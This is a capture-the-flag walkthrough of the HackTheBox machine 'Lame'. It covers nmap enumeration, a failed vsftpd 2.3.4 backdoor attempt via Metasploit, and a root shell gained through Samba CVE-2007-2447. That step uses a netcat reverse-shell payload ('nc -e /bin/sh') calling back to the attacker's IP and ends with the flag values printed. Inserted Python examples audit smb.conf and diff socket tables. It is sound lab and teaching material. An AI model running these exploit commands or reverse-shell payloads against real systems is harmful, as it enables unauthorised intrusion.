Run a quick nmap scan
└─$ nmap -sV -v 10.129.5.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 02:06 EDT
NSE: Loaded 46 scripts for scanning.
Initiating Ping Scan at 02:06
Scanning 10.129.5.9 [4 ports]
Completed Ping Scan at 02:06, 0.16s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:06
Completed Parallel DNS resolution of 1 host. at 02:06, 0.00s elapsed
Initiating SYN Stealth Scan at 02:06
Scanning 10.129.5.9 [1000 ports]
Discovered open port 21/tcp on 10.129.5.9
Discovered open port 22/tcp on 10.129.5.9
Discovered open port 445/tcp on 10.129.5.9
Discovered open port 139/tcp on 10.129.5.9
Completed SYN Stealth Scan at 02:07, 7.83s elapsed (1000 total ports)
Initiating Service scan at 02:07
Scanning 4 services on 10.129.5.9
Completed Service scan at 02:07, 11.42s elapsed (4 services on 1 host)
NSE: Script scanning 10.129.5.9.
Initiating NSE at 02:07
Completed NSE at 02:07, 0.01s elapsed
Initiating NSE at 02:07
Completed NSE at 02:07, 0.01s elapsed
Nmap scan report for 10.129.5.9
Host is up (0.12s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.83 seconds
Raw packets sent: 2005 (88.196KB) | Rcvd: 10 (424B)
How many of the nmap top 1000 TCP ports are open on the remote host? 4
What version of VSFTPd is running on Lame? 2.3.4
There is a famous backdoor in VSFTPd version 2.3.4, and a Metasploit module to exploit it. Does that exploit work here? no
https://www.exploit-db.com/exploits/49757
https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
┌──(kali㉿kali)-[~/Lame]
└─$ searchsploit -m 49757
Exploit: vsftpd 2.3.4 - Backdoor Command Execution
URL: https://www.exploit-db.com/exploits/49757
Path: /usr/share/exploitdb/exploits/unix/remote/49757.py
Codes: CVE-2011-2523
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Lame/49757.py
┌──(kali㉿kali)-[~/Lame]
└─$ python3 49757.py 10.129.5.9
/home/kali/Lame/49757.py:11: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
from telnetlib import Telnet
^C [+]Exiting...
┌──(kali㉿kali)-[~/Lame]
└─$ msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/b
asics/using-metasploit.html
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 10.129.5.9
rhosts => 10.129.5.9
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.129.5.9:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.5.9:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
What version of Samba is running on Lame? Give the numbers up to but not including "-Debian". 3.0.20
To enumerate the Samba version, let's run an nmap scan with the SMB NSE scripts against ports 139 and 445:
$ nmap --script=smb-os-discovery,smb-vuln* -p 139,445 10.129.5.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 02:15 EDT
Nmap scan report for 10.129.5.9
Host is up (0.12s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-10-12T02:16:01-04:00
Nmap done: 1 IP address (1 host up) scanned in 102.13 seconds
Next we try listing the SMB shares with an anonymous login, which succeeds:
┌──(kali㉿kali)-[~/Tools]
└─$ smbclient -L //10.129.5.9
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
What 2007 CVE allows for remote code execution in this version of Samba via shell metacharacters involving the SamrChangePassword function when the "username map script" option is enabled in smb.conf? CVE-2007-2447
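The question above describes the two preconditions for CVE-2007-2447: a Samba in the affected 3.0.x line and the "username map script" option set in smb.conf. As an added example (not from the write-up, and not Samba's own tooling), the following Python audits an smb.conf body for that option, honouring Samba's rule that parameter names are compared ignoring case and whitespace, and extracts the bare version from a banner such as "Samba 3.0.20-Debian" the way the earlier question asks for it. The config text, the script path in it and the function names are constructed for the example.

```python
"""Added example: audit smb.conf for 'username map script' (the setting
CVE-2007-2447 depends on) and pull the bare Samba version from a banner."""
import re

# Constructed sample config; the script path is an assumption for the example.
# Samba ignores case and internal whitespace in parameter names, so
# "UserName Map Script" is the same option as "username map script".
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = lame server
   UserName Map Script = /etc/samba/scripts/mapusers.sh
   security = user

[tmp]
   path = /tmp
   comment = oh noes!
"""


def normalise_key(key: str) -> str:
    """Samba compares parameter names ignoring case and whitespace."""
    return re.sub(r"\s+", "", key).lower()


def parse_smb_conf(text: str) -> dict:
    """Return {section: {normalised_key: value}} for an smb.conf body."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":      # blank or comment line
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, value = line.split("=", 1)  # only the first '=' is significant
            sections[current][normalise_key(key)] = value.strip()
    return sections


def username_map_script(text: str):
    """Return the configured script path, or None when the option is absent."""
    return parse_smb_conf(text).get("global", {}).get("usernamemapscript")


def samba_version(banner: str):
    """'Samba 3.0.20-Debian' -> '3.0.20' (the numbers up to, not including, '-Debian')."""
    m = re.search(r"Samba\s+(\d+(?:\.\d+)+)", banner)
    return m.group(1) if m else None


if __name__ == "__main__":
    print("version:", samba_version("Unix (Samba 3.0.20-Debian)"))
    script = username_map_script(SAMPLE_SMB_CONF)
    if script:
        print(f"[!] 'username map script' is set to {script!r}; "
              "on Samba 3.0.20 this is the precondition for CVE-2007-2447")
    else:
        print("[+] 'username map script' is not configured")
```

Running the file prints the version and flags the constructed config; on a real host you would feed it the output of `testparm -s`, which prints the effective configuration after Samba's own parsing.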
We will use the exploit https://github.com/Ziemni/CVE-2007-2447-in-Python
└─$ git clone https://github.com/Ziemni/CVE-2007-2447-in-Python.git
Cloning into 'CVE-2007-2447-in-Python'...
remote: Enumerating objects: 10, done.
remote: Counting objects: 100% (10/10), done.
remote: Compressing objects: 100% (10/10), done.
remote: Total 10 (delta 2), reused 3 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (10/10), done.
Resolving deltas: 100% (2/2), done.
└─$ python3 smbExploit.py 10.129.5.9 139 'nc -e /bin/sh 10.10.14.8 443'
pysmb is not installed: python3 -m pip install pysmb
Solution 1: Use a Python Virtual Environment
You can create a Python virtual environment to install pysmb without modifying the system Python installation.
- Create a virtual environment:
python3 -m venv ~/venv/pysmb-env
- Activate the virtual environment:
source ~/venv/pysmb-env/bin/activate
- Install pysmb within the virtual environment:
pip install pysmb
- Run your script:
python3 smbExploit.py 10.129.5.9 139 'nc -e /bin/sh 10.10.14.8 443'
To exit the virtual environment later, you can simply type:
deactivate
Solution 2: Use pipx to Install pysmb
pipx allows you to install Python packages in isolated environments and run them easily.
- Install pipx:
sudo apt install pipx
- Install pysmb using pipx:
pipx install pysmb
- Run your script. Since pipx manages the dependencies, you should be able to run smbExploit.py without issues:
python3 smbExploit.py 10.129.5.9 139 'nc -e /bin/sh 10.10.14.8 443'
We will stick with the first solution (remember to start a listener on port 443 before running the script):
python3 -m venv ~/venv/pysmb-env
source ~/venv/pysmb-env/bin/activate
pip install pysmb
python3 smbExploit.py 10.129.5.9 139 'nc -e /bin/sh 10.10.14.8 443'
We catch the reverse shell on the listener:
└─$ rlwrap nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.129.5.9] 57893
whoami
root
cd /home/makis
cat user.txt
1ee8420c424dbee0d41b73c575041cdf
ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:b9:90:85
inet addr:10.129.5.9 Bcast:10.129.255.255 Mask:255.255.0.0
inet6 addr: dead:beef::250:56ff:feb9:9085/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:9085/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6021 errors:0 dropped:0 overruns:0 frame:0
TX packets:797 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:440800 (430.4 KB) TX bytes:103810 (101.3 KB)
Interrupt:19 Base address:0x2024
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:357 errors:0 dropped:0 overruns:0 frame:0
TX packets:357 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:150821 (147.2 KB) TX bytes:150821 (147.2 KB)
pwd
/home/makis
cd /root
cat root.txt
6a749bea1faf2ef8c910c0b18cec21be
We'll explore a bit beyond just getting a root shell on the box. While the official writeup doesn't cover this, you can look at 0xdf's write-up for more details. With a root shell, we can look at why the VSFTPd exploit failed. Our initial nmap scan showed four open TCP ports. Running netstat -tnlp shows many more ports listening, including ones bound to 0.0.0.0 and to the box's external IP, so they should be reachable from the network. What must be blocking connections to these ports? firewall
netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN 5511/xinetd
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN 5511/xinetd
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN 5511/xinetd
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN 5648/jsvc
tcp 0 0 0.0.0.0:32905 0.0.0.0:* LISTEN 5689/rmiregistry
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN 5700/unrealircd
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 5235/mysqld
tcp 0 0 0.0.0.0:1099 0.0.0.0:* LISTEN 5689/rmiregistry
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN 5700/unrealircd
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 5489/smbd
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN 5712/Xtightvnc
tcp 0 0 0.0.0.0:43535 0.0.0.0:* LISTEN 5411/rpc.mountd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 4690/portmap
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 5712/Xtightvnc
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 5668/apache2
tcp 0 0 0.0.0.0:8787 0.0.0.0:* LISTEN 5693/ruby
tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN 5648/jsvc
tcp 0 0 0.0.0.0:1524 0.0.0.0:* LISTEN 5511/xinetd
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 5511/xinetd
tcp 0 0 10.129.5.9:53 0.0.0.0:* LISTEN 5088/named
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 5088/named
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN 5511/xinetd
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN 5316/postgres
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 5479/master
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN 5088/named
tcp 0 0 0.0.0.0:51132 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 5489/smbd
tcp 0 0 0.0.0.0:51837 0.0.0.0:* LISTEN 4708/rpc.statd
tcp6 0 0 :::2121 :::* LISTEN 5586/proftpd: (acce
tcp6 0 0 :::3632 :::* LISTEN 5343/distccd
tcp6 0 0 :::53 :::* LISTEN 5088/named
tcp6 0 0 :::22 :::* LISTEN 5112/sshd
tcp6 0 0 :::5432 :::* LISTEN 5316/postgres
tcp6 0 0 ::1:953 :::* LISTEN 5088/named
When the VSFTPd backdoor is triggered, what port starts listening? 6200
If we look closely at the exploit from https://www.exploit-db.com/exploits/49757, after sending the trigger it connects back to the target on port 6200, where the backdoor shell listens:
tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
When the VSFTPd backdoor is triggered, does port 6200 start listening on Lame?
We will run the exploit and check. This time, we will use Metasploit.
└─$ msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/b
asics/using-metasploit.html
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 10.129.5.9
rhosts => 10.129.5.9
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.129.5.9:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.5.9:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
On the reverse shell we caught earlier, we will run ss -ntplu. The ss -ntplu command displays information about network connections in Linux, including both TCP and UDP listening ports. Here's what each flag stands for:
- n: Show numerical addresses instead of resolving hostnames.
- t: Display TCP sockets.
- p: Show the processes using the sockets.
- l: Show only listening sockets.
- u: Display UDP sockets.
When you run this command, it will display a list of all the TCP and UDP listening sockets along with the associated processes.
ss -ntplu
Netid Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp 0 64 *:512 *:* users:(("xinetd",5511,11))
tcp 0 64 *:513 *:* users:(("xinetd",5511,10))
tcp 0 64 *:2049 *:*
tcp 0 64 *:514 *:* users:(("xinetd",5511,9))
tcp 0 0 *:8009 *:* users:(("jsvc",5648,63))
tcp 0 50 *:32905 *:* users:(("rmiregistry",5689,8))
tcp 0 5 *:6697 *:* users:(("unrealircd",5700,3))
tcp 0 5 :::2121 :::* users:(("proftpd",5586,1))
tcp 0 50 *:3306 *:* users:(("mysqld",5235,10))
tcp 0 50 *:1099 *:* users:(("rmiregistry",5689,7))
tcp 0 5 *:6667 *:* users:(("unrealircd",5700,2))
tcp 0 50 *:139 *:* users:(("smbd",5489,22))
tcp 0 5 *:5900 *:* users:(("Xtightvnc",5712,3))
tcp 0 128 *:43535 *:* users:(("rpc.mountd",5411,7))
tcp 0 128 *:111 *:* users:(("portmap",4690,4))
tcp 0 128 *:6000 *:* users:(("Xtightvnc",5712,0))
tcp 0 128 *:80 *:* users:(("apache2",5668,3),("apache2",5669,3),("apache2",5672,3),("apache2",5675,3),("apache2",5677,3),("apache2",5679,3))
tcp 0 10 :::3632 :::* users:(("distccd",5343,4),("distccd",5344,4),("distccd",5555,4),("distccd",5556,4))
tcp 0 5 *:8787 *:* users:(("ruby",5693,3))
tcp 0 100 *:8180 *:* users:(("jsvc",5648,49))
tcp 0 64 *:1524 *:* users:(("xinetd",5511,12))
tcp 0 64 *:21 *:* users:(("xinetd",5511,5))
tcp 0 3 10.129.5.9:53 *:* users:(("named",5088,25))
tcp 0 3 127.0.0.1:53 *:* users:(("named",5088,23))
tcp 0 3 :::53 :::* users:(("named",5088,21))
tcp 0 128 :::22 :::* users:(("sshd",5112,3))
tcp 0 64 *:23 *:* users:(("xinetd",5511,6))
tcp 0 100 *:6200 *:* users:(("vsftpd",6040,5))
tcp 0 128 *:5432 *:* users:(("postgres",5316,6))
tcp 0 128 :::5432 :::* users:(("postgres",5316,3))
tcp 0 100 *:25 *:* users:(("master",5479,11))
tcp 0 128 ::1:953 :::* users:(("named",5088,29))
tcp 0 128 127.0.0.1:953 *:* users:(("named",5088,28))
tcp 0 64 *:51132 *:*
tcp 0 50 *:445 *:* users:(("smbd",5489,21))
tcp 0 128 *:51837 *:* users:(("rpc.statd",4708,8))
In the ss output, the line *:6200 owned by vsftpd (PID 6040) shows that port 6200 does start listening on Lame once the backdoor is triggered. It was absent from the earlier netstat listing, and it never appeared in our nmap scan, which is consistent with the firewall blocking inbound connections to it and explains why the Metasploit module completed without a session.
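The two host-side checks above (netstat showing far more listeners than nmap found, and ss showing a new vsftpd listener on 6200 after the trigger) are both instances of comparing socket tables. As an added example, not part of the write-up, the following Python does that comparison mechanically: it parses `ss -ntplu` output, reports network-facing TCP listeners that the external scan did not see open (the fingerprint of a host firewall), and diffs a "before" and "after" snapshot to surface a listener that appeared between them. The sample lines are copied from the write-up's ss output; the "before" snapshot is constructed by dropping the 6200 line, and the NMAP_OPEN set is the four ports from the first scan. Function names and the loopback set are the example's own.

```python
"""Added example: reconcile 'ss -ntplu' socket tables with an external scan
and diff two snapshots to catch a newly appeared listener."""
import re

# Open ports reported by the initial 'nmap -sV' scan in the write-up.
NMAP_OPEN = {21, 22, 139, 445}

# Sample lines copied from the write-up's 'ss -ntplu' output (trimmed).
SS_AFTER = """\
Netid Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp 0 64 *:21 *:* users:(("xinetd",5511,5))
tcp 0 128 :::22 :::* users:(("sshd",5112,3))
tcp 0 50 *:139 *:* users:(("smbd",5489,22))
tcp 0 50 *:445 *:* users:(("smbd",5489,21))
tcp 0 128 *:80 *:* users:(("apache2",5668,3),("apache2",5669,3))
tcp 0 50 *:3306 *:* users:(("mysqld",5235,10))
tcp 0 3 10.129.5.9:53 *:* users:(("named",5088,25))
tcp 0 3 127.0.0.1:53 *:* users:(("named",5088,23))
tcp 0 128 127.0.0.1:953 *:* users:(("named",5088,28))
tcp 0 64 *:2049 *:*
tcp 0 100 *:6200 *:* users:(("vsftpd",6040,5))
"""
# Constructed 'before' snapshot: the same host without the 6200 socket.
SS_BEFORE = "\n".join(l for l in SS_AFTER.splitlines() if ":6200 " not in l) + "\n"

LINE_RE = re.compile(
    r"^(?P<proto>tcp|udp)\s+\d+\s+\d+\s+(?P<local>\S+)\s+\S+"
    r"(?:\s+users:\((?P<users>.*)\))?\s*$")
USER_RE = re.compile(r'\("([^"]+)",(\d+),\d+\)')
LOOPBACK = {"127.0.0.1", "::1"}


def parse_ss(text):
    """Return {(proto, bind_addr, port): process_name or None} for each listening socket."""
    sockets = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:                      # header or unparseable line
            continue
        addr, port = m.group("local").rsplit(":", 1)   # '*:21', ':::22', '::1:953'
        users = m.group("users")
        proc = USER_RE.search(users).group(1) if users else None
        sockets[(m.group("proto"), addr, int(port))] = proc
    return sockets


def externally_bound(sockets):
    """Sockets bound to a non-loopback address, i.e. reachable from the network in principle."""
    return {k: v for k, v in sockets.items() if k[1] not in LOOPBACK}


def filtered_ports(sockets, seen_open):
    """TCP ports listening on a network-facing address that the external scan did not see open.
    A long list here means something in the path (here a host firewall) drops the traffic."""
    return sorted({port for (proto, _, port) in externally_bound(sockets)
                   if proto == "tcp" and port not in seen_open})


def new_listeners(before, after):
    """Sockets present in 'after' but not in 'before'."""
    return {k: v for k, v in after.items() if k not in before}


if __name__ == "__main__":
    after = parse_ss(SS_AFTER)
    print("listening but not seen open externally:", filtered_ports(after, NMAP_OPEN))
    for (proto, addr, port), proc in new_listeners(parse_ss(SS_BEFORE), after).items():
        print(f"new listener: {proto} {addr}:{port} ({proc})")
```

On a live host you would capture `ss -ntplu` into a file before and after the event of interest and pass the two texts in; the diff is what tells you a backdoor or an unexpected service came up, even when an external scan cannot reach it.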